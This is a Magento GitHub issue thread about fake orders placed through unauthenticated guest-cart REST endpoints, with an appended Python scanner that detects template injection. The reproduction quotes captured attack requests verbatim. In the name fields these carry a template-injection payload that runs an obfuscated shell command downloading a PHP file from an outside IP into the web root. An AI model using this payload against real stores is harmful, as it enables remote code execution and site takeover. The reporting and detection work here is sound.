Open pratikkamani opened 1 month ago
Hi @pratikkamani. Thank you for your report. To speed up processing of this issue, make sure that the issue is reproducible on the vanilla Magento instance following Steps to reproduce. To deploy vanilla Magento instance on our environment, add a comment to the issue:
@magento give me 2.4-develop instance - upcoming 2.4.x release
@magento I am working on this
Join Magento Community Engineering Slack and ask your questions in #github channel.
According to the Magento Contribution requirements, all issues must go through the Community Contributions Triage process. Community Contributions Triage is a public meeting. You can find the schedule on the Magento Community Calendar page. The triage of issues happens in the queue order. If you want to speed up the delivery of your contribution, join the Community Contributions Triage session to discuss the appropriate ticket.
Hi @engcom-Bravo. Thank you for working on this issue. In order to make sure that the issue has enough information and is ready for development, please read and check the following instruction:
- Add the Area: XXXXX label to the ticket, indicating the functional areas it may be related to.
- Verify the issue on the 2.4-develop branch: add the comment @magento give me 2.4-develop instance to deploy test instance on Magento infrastructure.
- If the issue is reproducible on the 2.4-develop branch, please, add the label Reproduced on 2.4.x.
- Add the label Issue: Confirmed once verification is complete.
I have a similar issue with a Magento 2 website on version 2.3.5-p7, with lots of orders that are generated with the same format of code.
Affecting us as well, on Magento 2.4.6. We have installed the recommended security patch for CVE-2024-34102, but it still allows orders and customer account creation through the API unsecured.
Patching is mandatory, but the solution below (creating a custom module) is how I completely stopped execution of orders like these:
https://github.com/magento/magento2/issues/39002#issuecomment-2291143582
Thanks, I really appreciate this. I will try it.
@magento give me 2.4-develop instance
Hi @engcom-Bravo. Thank you for your request. I'm working on Magento instance for you.
Hi @engcom-Bravo, unfortunately there is no ability to deploy Magento instance at the moment. Please try again later.
Preconditions and environment
Steps to reproduce
Call the API Site_URL/rest/default/V1/guest-carts with an unprotected POST REST API.
Route (POST):
/rest/default/V1/guest-carts
Response: Magento\Quote\Api\GuestCartManagementInterface::createEmptyCart(): DZ6S7TOtfMyuADCUTGdaues3ZsraiapD
Route (POST):
/rest/default/V1/guest-carts/DZ6S7TOtfMyuADCUTGdaues3ZsraiapD/items
Request:{"cartItem":{"sku":"A600-AL","qty":1,"quote_id":"DZ6S7TOtfMyuADCUTGdaues3ZsraiapD"},"cartId":"DZ6S7TOtfMyuADCUTGdaues3ZsraiapD"}
Response: Magento\Quote\Api\GuestCartItemRepositoryInterface::save(): {"item_id":160271,"sku":"A600-AL","qty":1,"name":"A600-AL","price":19.12,"product_type":"simple","quote_id":"129891"}
Route (POST):
/rest/default/V1/guest-carts/DZ6S7TOtfMyuADCUTGdaues3ZsraiapD/estimate-shipping-methods
Request:{"address":{"region":"New York","region_id":43,"region_code":"NY","country_id":"US","street":["123 Oak Ave"],"postcode":"10577","city":"New York","firstname":"{{var this.getTemp\tlateFil\tter().filter(firstname)}}","lastname":"{{var this.getTemp\tlateFil\tter().add\tAfterFil\tterCallb\tack(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}http:\/\/185.157.161.162\/cache.php?m=8216-29079-10075)}}","email":"johnsmith9172@outlook.com","telephone":"512 555 1991"},"cartId":"DZ6S7TOtfMyuADCUTGdaues3ZsraiapD"}
Response: Magento\Quote\Api\GuestShipmentEstimationInterface::estimateByExtendedAddress(): [{"carrier_code":"ups","method_code":"03","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Ground","amount":11.19,"base_amount":11.19,"available":true,"error_message":"","price_excl_tax":11.19,"price_incl_tax":11.19},{"carrier_code":"ups","method_code":"12","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Three-Day Select","amount":26.41,"base_amount":26.41,"available":true,"error_message":"","price_excl_tax":26.41,"price_incl_tax":26.41},{"carrier_code":"ups","method_code":"02","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Second Day Air","amount":28.79,"base_amount":28.79,"available":true,"error_message":"","price_excl_tax":28.79,"price_incl_tax":28.79},{"carrier_code":"ups","method_code":"01","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Next Day Air","amount":50.28,"base_amount":50.28,"available":true,"error_message":"","price_excl_tax":50.28,"price_incl_tax":50.28},{"carrier_code":"ups","method_code":"14","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Next Day Air Early A.M.","amount":160.18,"base_amount":160.18,"available":true,"error_message":"","price_excl_tax":160.18,"price_incl_tax":160.18},{"carrier_code":"usps","method_code":"1","carrier_title":"United States Postal Service","method_title":"Priority Mail","amount":18.05,"base_amount":18.05,"available":true,"error_message":"","price_excl_tax":18.05,"price_incl_tax":18.05},{"carrier_code":"usps","method_code":"17","carrier_title":"United States Postal Service","method_title":"Priority Mail Medium Flat Rate Box","amount":18.4,"base_amount":18.4,"available":true,"error_message":"","price_excl_tax":18.4,"price_incl_tax":18.4},{"carrier_code":"usps","method_code":"22","carrier_title":"United States Postal Service","method_title":"Priority Mail Large Flat Rate Box","amount":24.75,"base_amount":24.75,"available":true,"error_message":"","price_excl_tax":24.75,"price_incl_tax":24.75}]
Route (POST):
/rest/default/V1/guest-carts/DZ6S7TOtfMyuADCUTGdaues3ZsraiapD/shipping-information
Request:{"addressInformation":{"shipping_address":{"region":"New York","region_id":43,"region_code":"NY","country_id":"US","street":["123 Oak Ave"],"postcode":"10577","city":"New York","firstname":"{{var this.getTemp\tlateFil\tter().filter(firstname)}}","lastname":"{{var this.getTemp\tlateFil\tter().add\tAfterFil\tterCallb\tack(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}http:\/\/185.157.161.162\/cache.php?m=8216-29079-10075)}}","email":"johnsmith9172@outlook.com","telephone":"512 555 1991"},"billing_address":{"region":"New York","region_id":43,"region_code":"NY","country_id":"US","street":["123 Oak Ave"],"postcode":"10577","city":"New York","firstname":"{{var this.getTemp\tlateFil\tter().filter(firstname)}}","lastname":"{{var this.getTemp\tlateFil\tter().add\tAfterFil\tterCallb\tack(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}http:\/\/185.157.161.162\/cache.php?m=8216-29079-10075)}}","email":"johnsmith9172@outlook.com","telephone":"512 555 1991"},"shipping_method_code":"03","shipping_carrier_code":"ups"},"cartId":"pVLLOZul1hdTK5aeirQ9B6kQYXfXhtrF"}
Response Magento\Checkout\Api\GuestShippingInformationManagementInterface::saveAddressInformation():
{"payment_methods":[{"code":"paypal_express","title":"PayPal Website Payments Standard"},{"code":"authnetcim","title":"Credit Card (Authorize.Net CIM)"}],"totals":{"grand_total":30.31,"base_grand_total":30.31,"subtotal":19.12,"base_subtotal":19.12,"discount_amount":0,"base_discount_amount":0,"subtotal_with_discount":19.12,"base_subtotal_with_discount":19.12,"shipping_amount":11.19,"base_shipping_amount":11.19,"shipping_discount_amount":0,"base_shipping_discount_amount":0,"tax_amount":0,"base_tax_amount":0,"weee_tax_applied_amount":null,"shipping_tax_amount":0,"base_shipping_tax_amount":0,"subtotal_incl_tax":19.12,"shipping_incl_tax":11.19,"base_shipping_incl_tax":11.19,"base_currency_code":"USD","quote_currency_code":"USD","items_qty":1,"items":[{"item_id":160271,"price":19.12,"base_price":19.12,"qty":1,"row_total":19.12,"base_row_total":19.12,"row_total_with_discount":0,"tax_amount":0,"base_tax_amount":0,"tax_percent":0,"discount_amount":0,"base_discount_amount":0,"discount_percent":0,"price_incl_tax":19.12,"base_price_incl_tax":19.12,"row_total_incl_tax":19.12,"base_row_total_incl_tax":19.12,"options":"[]","weee_tax_applied_amount":null,"weee_tax_applied":null,"name":"A600-AL"}],"total_segments":[{"code":"subtotal","title":"Subtotal","value":19.12},{"code":"shipping","title":"Shipping & Handling (United Parcel Service (Select UPS for 10% off Shipping) - UPS Ground)","value":11.19},{"code":"tax","title":"Tax","value":0,"area":"taxes","extension_attributes":{"tax_grandtotal_details":[]}},{"code":"grand_total","title":"Grand Total","value":30.31,"area":"footer"}]}}
Route (POST):
/rest/default/V1/guest-carts/DZ6S7TOtfMyuADCUTGdaues3ZsraiapD/payment-information
Request:{"cartId":"DZ6S7TOtfMyuADCUTGdaues3ZsraiapD","email":"johnsmith9172@outlook.com","paymentMethod":{"method":"authnetcim","extension_attributes":{"agreement_ids":["1","2","3","4","5","6","7","8","9","10","11","12","13","14","15","16","17","18","19","20","21","22","23","24","25","26","27","28","29","30","31","32","33","34","35","36","37","38","39","40","41","42","43","44","45","46","47","48","49","50"]}},"billing_address":{"email":"johnsmith9172@outlook.com","region":"New York","region_id":43,"region_code":"NY","country_id":"US","street":["123 Oak Ave"],"postcode":"10577","city":"New York","telephone":"512 555 1991","firstname":"{{var this.getTemp\tlateFil\tter().filter(firstname)}}","lastname":"{{var this.getTemp\tlateFil\tter().add\tAfterFil\tterCallb\tack(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}http:\/\/185.157.161.162\/cache.php?m=8216-29079-10075)}}"}}
With the above shipping information and payment information in various combinations, they make thousands of API calls and try to place an order. They inject the code when an order is placed successfully.
They also try:
API.INFO -
Request-Headers:
Cookie: PHPSESSID=90d3af9b57b19a50856c5b0d37feef2d; discount_custom=-0
X-Https: 1
Content-Type: application/json; charset=utf-8
User-Agent: Mozilla/5.0 (Linux; Android 11; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Mobile Safari/537.36
Content-Length: 490
X-Sucuri-Country: US
X-Sucuri-Clientip: 154.30.211.206
X-Real-Ip: 154.30.211.206
X-Forwarded-Proto: https
X-Forwarded-For: 154.30.211.206
Host: p*********s.com
The IP of the hacker is reported as abusive: https://www.abuseipdb.com/check/154.30.211.206
Expected result
The spammer should not be able to create an order successfully; Magento should block them from making fake orders with the native Magento API. This is a misuse of the native Magento API. Should Magento protect this API with a token?
Actual result
Fake order created with the native Magento API.
Additional information
No response
Release note
No response
Triage and priority
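As an added defensive example (my own code, not Magento's and not part of this issue or the linked custom module), the scanner below flags the pattern the reporter shows: Magento template directives (`{{...}}`) placed in customer-supplied address fields, with the method name split by tab characters (`getTemp\tlateFil\tter`) so a naive string match misses it. It rejoins split identifiers by stripping all whitespace, then walks every string field of a JSON request body, so it can be run over stored request logs for the guest-cart endpoints or put in front of them as a validation step. It goes beyond the report in checking every string field rather than only firstname/lastname. The request bodies, cart id and the `SUSPICIOUS_CALLS` list (limited to the two method names visible in this report) are constructed here, and this complements the vendor patch rather than replacing it, as the thread already notes.

```python
from __future__ import annotations

import json
import re
from typing import Any, Iterator

# Any {{...}} directive inside a customer-typed field is suspicious: legitimate
# names, street lines and cities never contain Magento template syntax.
DIRECTIVE_RE = re.compile(r"\{\{.*?\}\}", re.DOTALL)
# Method names that appear in the reported payload (assumption: this list is
# only what the report shows, extend it for your own environment).
SUSPICIOUS_CALLS = ("getTemplateFilter", "addAfterFilterCallback")
WS_RE = re.compile(r"\s+")


def normalise(value: str) -> str:
    """Strip all whitespace (tabs, spaces, newlines) so split identifiers rejoin."""
    return WS_RE.sub("", value)


def classify(value: str) -> list[str]:
    """Return the reasons a single string value looks like a template injection.

    An empty list means the value looks clean.
    """
    reasons: list[str] = []
    compact = normalise(value)
    if DIRECTIVE_RE.search(compact):
        reasons.append("template_directive")
    lowered = compact.lower()
    for name in SUSPICIOUS_CALLS:
        if name.lower() in lowered:
            reasons.append(name)
    return reasons


def walk_strings(node: Any, path: str = "") -> Iterator[tuple[str, str]]:
    """Yield (json_path, value) for every string inside a nested JSON structure."""
    if isinstance(node, dict):
        for key, child in node.items():
            yield from walk_strings(child, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, child in enumerate(node):
            yield from walk_strings(child, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def scan_request(body: str) -> dict[str, list[str]]:
    """Scan a JSON request body; map each offending field path to its reasons.

    Returns an empty dict when nothing in the body looks like a directive.
    """
    findings: dict[str, list[str]] = {}
    for path, value in walk_strings(json.loads(body)):
        reasons = classify(value)
        if reasons:
            findings[path] = reasons
    return findings


# Constructed sample bodies for the shipping-information endpoint (not captured
# traffic). The injected one uses the tab-split method name from the report but
# only a harmless filter() call, which is enough to exercise the detector.
BENIGN_BODY = json.dumps({
    "addressInformation": {"shipping_address": {
        "firstname": "John", "lastname": "Smith",
        "street": ["123 Oak Ave"], "city": "New York"}},
    "cartId": "EXAMPLECARTID",
})
INJECTED_BODY = json.dumps({
    "addressInformation": {"shipping_address": {
        "firstname": "John",
        "lastname": "{{var this.getTemp\tlateFil\tter().filter(lastname)}}",
        "street": ["123 Oak Ave"]}},
    "cartId": "EXAMPLECARTID",
})


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("injected", INJECTED_BODY)):
        print(label, scan_request(body))
```

Whitespace stripping is deliberately blunt: a legitimate name never needs its internal spaces preserved for this check, and any directive that survives the rejoin is caught regardless of where the tabs were placed. Log each finding with the field path and the client IP from the request headers so repeated hits from one source can be rate-limited or blocked upstream.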